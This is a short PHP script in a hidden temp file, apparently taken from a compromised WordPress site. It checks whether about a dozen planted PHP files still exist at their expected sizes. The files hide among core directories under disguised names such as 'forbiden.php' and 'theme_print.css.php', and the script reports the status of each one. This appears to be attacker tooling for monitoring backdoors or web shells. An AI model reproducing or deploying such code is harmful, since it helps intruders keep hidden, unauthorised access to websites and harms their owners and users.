File: //tmp/.tkn
<?php $r = '/home/carrerup/dawoodtechnologies.com'; $x = ["/wp-includes/js/tinymce/utils/default_folders.php"=>"bd@@68663@@947",
"/wp-includes/sodium_compat/src/Core/SecretStream/driver.php"=>"bd@@72260@@895",
"/wp-includes/Requests/src/Auth/theme_print.css.php"=>"bd@@72273@@941",
"/wp-includes/block-bindings/post.data.php"=>"bd@@72288@@990",
"/wp-includes/IXR/class.IXR.message.php"=>"bd@@72291@@902",
"/wp-includes/js/dist/script-modules/block-library/query/usercp_confirm.php"=>"bd@@72298@@871",
"/wp-includes/PHPMailer/forbiden.php"=>"bd@@85413@@871",
"/wp-includes/pomo/plural.php"=>"bd@@85414@@1035",
"/wp-includes/block-patterns/query.large.posts.php"=>"bd@@85415@@951",
"/wp-admin/css/colors/midnight/ada.php"=>"bd@@85434@@988",
"/wp-includes/blocks/term-count/Forms.php"=>"bd@@85436@@1086"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');